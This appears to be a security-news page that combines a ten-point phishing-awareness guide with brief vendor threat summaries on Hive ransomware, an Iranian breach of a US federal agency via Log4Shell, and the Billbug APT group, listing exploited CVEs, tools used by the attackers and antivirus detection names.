10 Ways to spot a phishing attempt

Read Time:6 Minute, 22 Second

The content of this post is solely the responsibility of the author.  AT&T does not adopt or endorse any of the views, positions, or information provided by the author in this article. 

Phishing attacks are becoming more and more common, and they’re only getting more sophisticated. While there are a variety of ways to defend yourself against phishing attacks, one of the best methods is simply to be able to spot them. With that in mind, here are 10 common signs that an email or other communication may be a phishing attempt.

Calls from an unknown number

If you get a call from an unknown number, and the caller claims to be from your bank or another organization, be very careful. This is a classic phishing tactic.

The caller will try to obtain personal information from you, such as your credit card number or Social Security number. They might also try to get you to click on a link that will install malware on your computer.

Don’t give out any personal information to someone who calls you out of the blue. And if they try to get you to click on a link, don’t do it. Hang up and call the organization they claimed to be from using a number you know to be legitimate (e.g., the number on the back of your credit card or from the organization’s website).

What’s more, consider doing a reverse phone lookup on them to see where the number is actually originating from.

The message is not personalized

If you receive an email that doesn’t address you by name or refers to you as “Dear User” or “Dear Valued Customer,” be wary. Phishing emails often use generic greetings in an attempt to seem more widespread – and less suspicious – than they actually are.

That’s because they are usually sent out en masse as part of a massive automated campaign. Phishers usually just have a list of email addresses and the idea isn’t to find out the name of the person it belongs to or do any kind of in-depth personalization, but to get as many people as possible to click on the links in their message.

The sender’s email address doesn’t match the organization they’re claiming to represent

This is a pretty straightforward way to spot a phishing attempt. If you get an email purporting to be from your bank, but the email address it comes from is something like johnsmith12345@gmail.com, then it’s pretty clear that something is not right.

Organizations won’t send out official communications from a Gmail or Hotmail address. They will always use their own domain name (e.g., WellsFargo.com, PayPal.com). So, if the email you receive is coming from anything other than an organization’s official domain, it’s a huge red flag.

There are grammatical errors or typos in the email

If you receive an email that is full of grammatical errors, typos, or just generally seems to be poorly written, it’s a good indicator that it’s a phishing email.

Phishers often send out their emails quickly and without much care or attention to detail. So if an email looks like it was dashed off in a hurry, with no regard for proper spelling or grammar, it’s probably a phishing email.

Phishing scams also originate overseas, and the architects of these scams aren’t native English speakers. So another giveaway that an email might be a phishing attempt is if it contains poor grammar or strange phrasing.

The message is urgent or includes a sense of urgency

Phishers often try to create a sense of urgency in their emails in order to get people to act quickly without thinking. They might say that your account is about to be closed, or that you need to take action immediately to prevent some kind of negative consequence.

Of course, none of this is true. Phishers just want to create a sense of urgency so that you’ll click on their links without thinking. So, if an email includes language that tries to create a sense of urgency, be wary.

The email contains attachments that you weren’t expecting

If you receive an email with an attachment that you weren’t expecting, be very careful before opening it. This is another common phishing tactic.

The phisher will send you an email with an attachment that appears to be benign, such as a PDF document or an image. But when you open the attachment, it will install malware on your computer.

If you weren’t expecting an email with an attachment, be very careful before opening it. If you don’t know the sender, or if the email looks suspicious in any way, don’t open the attachment. Delete the email and move on.

The email contains threats or ultimatums

Phishers will sometimes try to intimidate their victims into taking action by including threats or ultimatums in their emails. They might say that your account will be closed if you don’t take action, or that you’ll be subject to legal action if you don’t respond.

Of course, none of this is true. Phishers just want to scare you into taking action without thinking. So, if an email includes threats or ultimatums, it’s a good indicator that it’s a phishing attempt.

The email asks for personal information

Phishers will often try to obtain personal information from their victims, such as credit card numbers, Social Security numbers, or login credentials. They might do this by asking you to fill out a form with your personal information. Or they might include a link that takes you to a fake website where you’re prompted to enter your personal information.

Never give out personal information in response to an email or click on a link that takes you to a website where you’re prompted to enter your personal information. If you need to update your account information, log in to the website directly and update it yourself. Don’t do it through an email or a link in an email.

The email is from a free email service

If an email is from a free email service like Gmail or Yahoo, that’s a red flag. While there’s nothing inherently wrong with free email services, phishers often use them to send their emails because they’re easy to create and don’t require any verification.

So if you receive an email from a free email service, be extra careful. It’s not necessarily a phishing attempt, but it’s worth taking a closer look before taking any action.

Someone with no followers or friends adds you on social media

This one is more common on social media sites like Facebook and LinkedIn. If someone with no followers or friends adds you, that’s a red flag. It’s possible that they’re just trying to build up their network, but it’s also possible that they’re a phisher.

If someone with no followers or friends adds you on social media, be careful before accepting their friend request. Take a look at their profile and see if anything looks suspicious. If you’re not sure, err on the side of caution and don’t accept their request.

Conclusion

Phishing is a serious problem, and it’s only getting worse. By understanding how phishing works and knowing what to look for, you can protect yourself from these attacks.

If you’re ever unsure about an email or a website, err on the side of caution and don’t take any action. It’s better to be safe than sorry. And if you think you might have been the victim of a phishing attack, change your passwords and run a virus scan on your computer just to be safe.

Read More

Know thy enemy: thinking like a hacker can boost cybersecurity strategy

Read Time:39 Second

As group leader for Cyber Adversary Engagement at MITRE Corp., Maretta Morovitz sees value in getting to know the enemy – she can use knowledge about cyber adversaries to distract, trick, and deflect them and develop strategies to help keep threat actors from getting whatever they’re after.

That could mean placing decoys and lures that exploit their expectations for what an attacker will find when they first hack into an environment, she says. Or it could mean deliberately disorienting them by creating scenarios that don’t match up to those expectations. “It’s about how to drive defenses by knowing how the adversaries actually behave,” says Morovitz, who is also group leader for MITRE Engage, a cyber adversary engagement framework.

To read this article in full, please click here

Read More

Alert (AA22-321A): #StopRansomware: Hive Ransomware

Read Time:2 Minute, 30 Second

FortiGuard Labs is aware of that the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Department of Health and Human Services (HHS) released a joint advisory for Hive ransomware as part of their #StopRansomware effort. Hive ransomware is a Ransomware-as-a-Service (RaaS) consisting of developers and affiliates. It attempts to steal data, encrypt files on victims’ machines, and demand ransom recover affected files and prevent stolen data from being published to their data leak site, called “HiveLeaks,” on the DarkWeb.Why is this Significant?This is significant because Hive is a Ransomware-as-a-Service (RaaS) that, according to the advisory, has victimized more than 1,300 enterprises globally and extorted 100 million US dollars. The group has been active since June 2021 and did not only target private enterprises but also essential industries such as government organizations and healthcare services. What is Hive Ransomware?Hive is a Ransomware-as-a-Service (RaaS) consisting of two groups: developers and affiliates. Hive developers create, maintain, and update Hive ransomware and infrastructures such date leak site named “HiveLeaks” and negotiant site. Hive affiliates are responsible for finding and infecting victims, exfiltrating files, and deploying Hive ransomware to the victims’ network.The latest Hive ransomware iterations are written in the Rust programing language. Older variants are written in Go.Reported initial infection vectors include emails, exploiting vulnerabilities such as CVE-2020-12812, CVE-2021-31207, CVE-2021-34473 and CVE-2021-34523.Hive ransomware encrypts files on victims’ machines and typically appends a “.hive” file extension to the affected files. It also drops a ransom note named “HOW_TO_DECRYPT.txt”, which instructs victims to visit a negotiation site on TOR.The advisory states that Hive ransomware is known to victimize organizations that were previously infected with Hive ransomware and recovered without paying ransom.What is the Status of Protection?FortiGuard Labs provides the following AV signatures for recent Hive ransomware samples that we collected:W32/Filecoder_Hive.A!tr.ransomW32/Filecoder_Hive.B!tr.ransomW32/Hive.4a4e!tr.ransomW32/Hive.B0FF!tr.ransomW32/Hive.d10e!tr.ransomW32/Hive.FD38!tr.ransomW64/Filecoder.AW!tr.ransomW64/Filecoder_Hive.A!tr.ransomW64/Filecoder_Hive.B!tr.ransomW64/Hive.31ec!tr.ransomW64/Hive.6bcb!tr.ransomW64/Hive.71de!tr.ransomW64/Hive.7cec!tr.ransomW64/Hive.933c!tr.ransomW64/Hive.A!trW64/Hive.B0FF!tr.ransomW64/Hive.c2e4!tr.ransomW64/Hive.e550!tr.ransomW64/Hive.ea51!tr.ransomW32/Filecoder.507F!tr.ransomW32/Agent.0b0f!tr.ransomW32/Agent.32a5!tr.ransomW32/Agent.65e3!tr.ransomW32/Agent.69ce!tr.ransomW32/Agent.6d49!tr.ransomW32/Agent.7c49!tr.ransomW64/Agent.U!trAll network IOCs on the advisory are blocked by Webfiltering.FortiGuard Labs provides the following IPS signatures for the vulnerabilities reportedly exploited as initial infection vector by Hive threat actors:MS.Exchange.MailboxExportRequest.Arbitrary.File.Write (CVE-2021-31207)MS.Exchange.Server.Autodiscover.Remote.Code.Execution (CVE-2021-34473)MS.Exchange.Server.Common.Access.Token.Privilege.Elevation (CVE-2021-34523)

Read More

Joint CyberSecurity Advisory on a U.S. Federal Agency Breached by Iranian Threat Actors

Read Time:1 Minute, 58 Second

FortiGuard Labs is aware of a joint advisory (AA22-320A) issued by Cybersecurity and Infrastructure security Agency (CISA) and the Federal Bureau of Investigation (FBI) on November 16, 2022. The advisory is related to an Iranian government-sponsored campaign where threat actors breached an unnamed U.S. federal agency and deployed a crypto miner and a hacktool to the compromised network.Why is this Significant?This is significant because threat actors backed by the Iranian government compromised a U.S. federal agency and deployed XMRig (crypto miner) and Mimikatz (a post-exploit tool used for credential harvesting).In February 2022, Iranian threat actors reportedly compromised a federal government agency by exploiting CVE-2021-44228, also known as Log4Shell, in an unpatched VMware Horizon server. This signifies the importance of timely patching of vulnerable systems.How did the Attack Occur?The initial infection vector was exploitation of CVE-2021-44228 (Log4Shell) in a vulnerable VMware Horizon server. Once the attacker got a foot in the door to the victim’s network, the attacker downloaded and installed XMRig (mining software for Monero cyrptocurrency) after excluding the victim’s C: drive from scanning by Windows Defender. The attacker leveraged RDP to move laterally to other systems on the victim’s network, deployed PsExec (a free Microsoft tool execute processes on other systems) and Mimikatz (an open-source tool for credential harvesting) and implanted Ngrok (a dual use tunneling tool). Also, the attacker accessed the domain controller and retrieved a list of machines that belong to the domain furthering compromise.What is CVE-2021-44228 (Log4Shell)?CVE-2021-44228 is a remote code execution vulnerability in the popular Java-based logging utility Log4j2. The vulnerability was disclosed to the public by Apache in early December, however Proof-of-Concept (PoC) code for CVE-2021-44228 was believed to be available earlier.FortiGuard Labs previously released Outbreak Alert and Threat Signal for CVE-2022-44228. See the Appendix for a link to “Outbreak Alert: Apache Log4j2 Vulnerability” and “Apache Log4J Remote Code Execution Vulnerability (CVE-2021-44228)”.What is the Status of Coverage? FortiGuard Labs detects the malicious files in the advisory that are available with the following AV signatures:Riskware/CoinMinerPossibleThreatAll reported network IOCs in the advisory are blocked by Webfiltering.FortiGuard Labs has IPS coverage in place for CVE-2021-44228 (Log4Shell):Apache.Log4j.Error.Log.Remote.Code.Execution

Read More

APT Billbug Victimized Asian Certification Authority and Government Agencies

Read Time:1 Minute, 13 Second

FortiGuard Labs is aware of a report that APT group “Billbug” compromised a certificate authority (CA) as well as multiple government and defense organizations in Asia. Also known as Lotus Blossom and Thrip, the APT group reportedly has been active since 2009 and uses custom backdoor malware “Hannotog” and “Sagerunex” as well as available tools in compromised machines.Why is this Significant?This is significant because Billbug APT threat actor group targeted a certificate authority (CA). Should digital certificates be compromised, the attacker could use them to sign malware for detection evasion by security solutions and eavesdrop on HTTPS communications.Also, the reports indicate that multiple organizations in government and defense sectors in Asia were compromised by Billbug APT. What is Billbug APT?Billbug, Lotus Blossom and Thrip, is a threat actor that has been reportedly active since at last 2009 and has interests in U.S. organizations as well as government, defense, and communications organizations in Southeast Asia. Their primary motive is thought to be information espionage.Billbug APT employs living-off-the-land techniques and uses custom malware. The tools that were reportedly used by Billbug APT are the following:Hannotog backdoorSagerunex backdoorAdFindCertutilLogMeInMimikatzNBTscanPingPort ScannerPowerShellPsExecRouteTracertWinmailWinRARWinSCPWhat is the Status of Coverage?FortiGuard Labs detects the files in the report with the following AV signatures:W32/Agent.QTP!trW32/Elsentric.J!trW32/Generic.A!trW32/PossibleThreatW64/Agentb.F!trW64/Agent.LF!trW64/Elsentric.E!trW64/Elsentric.G!trMalicious_Behavior.SBPossibleThreat.PALLAS.HRiskware/Kryptik

Read More